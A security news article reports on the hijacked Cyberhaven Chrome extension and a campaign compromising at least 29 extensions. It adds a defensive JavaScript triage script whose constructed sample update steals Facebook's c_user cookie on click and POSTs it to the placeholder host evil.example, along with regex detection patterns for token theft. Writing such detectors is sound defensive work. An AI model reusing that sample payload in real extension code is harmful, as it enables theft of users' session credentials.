
Cyberhaven Chrome Extension Hack Linked to Widening Supply Chain Campaign

The recent compromise of Cyberhaven’s Chrome extension appears to be part of a broad campaign that started over a year ago.


The supply chain attack in which cybersecurity firm Cyberhaven’s Chrome extension was compromised to steal users’ data appears to be part of a wider campaign in which at least 29 extensions were hit over the past year and a half.

As part of the Cyberhaven incident, a threat actor gained access to the company’s Chrome Web Store administrator account and published a new version of the extension that contained malicious code.

Cyberhaven offers a data detection and response platform designed to help organizations track and protect sensitive data and combat insider threats.

The attack was discovered on December 25, one day after it occurred, and the malicious version of the extension was available for download for just over 24 hours before being pulled and replaced with a clean version.

During that window, the malicious version was pushed automatically to every user who had the extension's automatic update feature enabled, exposing them to theft of sensitive information without any action on their part.

Cyberhaven determined that the malicious code stole Facebook access tokens, user IDs, and account information, and also registered a mouse click listener on Facebook.com.

According to Secure Annex founder John Tuckner, the attack appears to be linked to a long-lasting campaign in which at least 29 Chrome extensions have been compromised, potentially affecting over 2.5 million users.

Digging through indicators of compromise (IoCs), Tuckner found that three extensions were compromised in 2023: Earny – Up to 20% Cash Back in April, Visual Effects for Google Meet in June, and Tackker – online keylogger tool in October.


Malicious versions of ten other extensions emerged throughout 2024, and the number of occurrences spiked in December, when 16 extensions were compromised, including Cyberhaven's.

According to data analyzed by Tuckner, malicious versions of roughly a dozen extensions were seen over the past week alone, including three over the past two days: GraphQL Network Inspector, YesCaptcha assistant, and Proxy SwitchyOmega (V3).

Some of the analyzed extensions appear to be targeting sensitive information across websites such as 23andme, American Express, Bank of America, Zoom, and more, Tuckner explains.
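The behaviour described above (a content script injected into Facebook.com, a click listener, token and cookie access, and an outbound request to an undeclared host) is something defenders can screen for before an automatic update lands. The following is an added example, not code from Cyberhaven, Secure Annex, or any published IoC set: a static triage of an extension update that diffs the manifest's permissions against the installed version and flags content scripts that combine those traits. The sensitive-host list maps the brands named in this article to domains by assumption (e.g. zoom.us), the heuristic regexes are the editor's own, and the two sample bundles and the `evil.example` endpoint are constructed for illustration.

```javascript
// Static triage of a Chrome extension update (added example; heuristics and
// sample data are constructed, not published IoCs for this campaign).

// Hosts whose presence in a content script's "matches" is treated as sensitive.
// The brand-to-domain mapping is assumed.
const SENSITIVE_HOSTS = [
  "facebook.com", "23andme.com", "americanexpress.com",
  "bankofamerica.com", "zoom.us",
];

// Reduce a Chrome match pattern to its bare host; "<all_urls>" and
// wildcard-host patterns such as "*://*/*" both come back as "*".
function hostFromMatchPattern(pattern) {
  if (pattern === "<all_urls>") return "*";
  const m = /^(?:\*|https?):\/\/([^/]+)\//.exec(pattern);
  return m ? m[1].replace(/^\*\./, "") : null;
}

function isSensitiveHost(host) {
  return host === "*" ||
    SENSITIVE_HOSTS.some((s) => host === s || host.endsWith("." + s));
}

// Source-level heuristics for the behaviour described in the article:
// a click listener, token/cookie access, and an outbound request.
const HEURISTICS = [
  ["click-listener", /addEventListener\(\s*["'](?:click|mousedown|mouseup)["']/],
  ["token-access", /document\.cookie|access_?token|\bc_user\b/i],
  ["outbound-request", /\b(?:fetch|XMLHttpRequest|sendBeacon)\b/],
];

// Permissions and host permissions present in the update but not installed.
function addedPermissions(oldManifest, newManifest) {
  const before = new Set([
    ...(oldManifest.permissions || []), ...(oldManifest.host_permissions || [])]);
  return [...(newManifest.permissions || []), ...(newManifest.host_permissions || [])]
    .filter((p) => !before.has(p));
}

// bundle = { manifest: <parsed manifest.json>, files: { "name.js": "<source>" } }
function triageBundle(bundle) {
  const findings = [];
  const declaredHosts = new Set();
  for (const cs of bundle.manifest.content_scripts || []) {
    for (const pat of cs.matches || []) {
      const host = hostFromMatchPattern(pat);
      if (host === null) continue;
      declaredHosts.add(host);
      if (isSensitiveHost(host)) {
        findings.push(`content script injected into sensitive host: ${pat}`);
      }
    }
    for (const file of cs.js || []) {
      const src = bundle.files[file] || "";
      const hits = HEURISTICS.filter(([, re]) => re.test(src)).map(([name]) => name);
      if (hits.length) findings.push(`${file}: ${hits.join(", ")}`);
      // An absolute URL whose host the script is not declared to run on is a
      // candidate exfiltration endpoint.
      for (const url of src.match(/https?:\/\/[^\s"'`)]+/g) || []) {
        const host = new URL(url).hostname;
        const declared = [...declaredHosts].some(
          (d) => d !== "*" && (host === d || host.endsWith("." + d)));
        if (!declared) findings.push(`${file}: request to undeclared host ${host}`);
      }
    }
  }
  return findings;
}

function triageUpdate(oldBundle, newBundle) {
  return {
    from: oldBundle.manifest.version,
    to: newBundle.manifest.version,
    addedPermissions: addedPermissions(oldBundle.manifest, newBundle.manifest),
    findings: triageBundle(newBundle),
  };
}

// Constructed sample: a benign installed version and an update resembling the
// behaviour the article describes. "evil.example" is a placeholder domain.
const INSTALLED = {
  manifest: { manifest_version: 3, version: "1.0.0", permissions: ["storage"],
    content_scripts: [{ matches: ["*://*.example.com/*"], js: ["content.js"] }] },
  files: { "content.js": "document.title = 'ok';" },
};
const UPDATE = {
  manifest: { manifest_version: 3, version: "1.0.1",
    permissions: ["storage", "cookies"], host_permissions: ["<all_urls>"],
    content_scripts: [{ matches: ["*://*.facebook.com/*"], js: ["content.js"] }] },
  files: { "content.js": [
    "document.addEventListener('click', () => {",
    "  const token = document.cookie.match(/c_user=(\\d+)/);",
    "  fetch('https://evil.example/collect', { method: 'POST', body: String(token) });",
    "});"].join("\n") },
};

console.log(JSON.stringify(triageUpdate(INSTALLED, UPDATE), null, 2));
```

Run against an unpacked extension directory, the same checks can be applied by reading `manifest.json` and the referenced scripts from disk; the point of the permission diff is that a version bump which suddenly adds `cookies` or `<all_urls>` is exactly what an auto-update pipeline will otherwise apply silently.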

To date, five of the identified malicious extensions were removed from the Chrome Web Store, while eight others were replaced with clean versions, Cyberhaven included.

Further investigation by Tuckner and Adblock Plus founder and CTO Wladimir Palant revealed that the data-gathering code in some of the extensions was not the result of a compromise at all, but had been included by the developers themselves through a monetization SDK.

Cyberhaven has raised more than $136 million and was valued at $488 million when the company raised $88 million via a Series C funding round in June 2024.


Written by Ionut Arghire, an international correspondent for SecurityWeek.
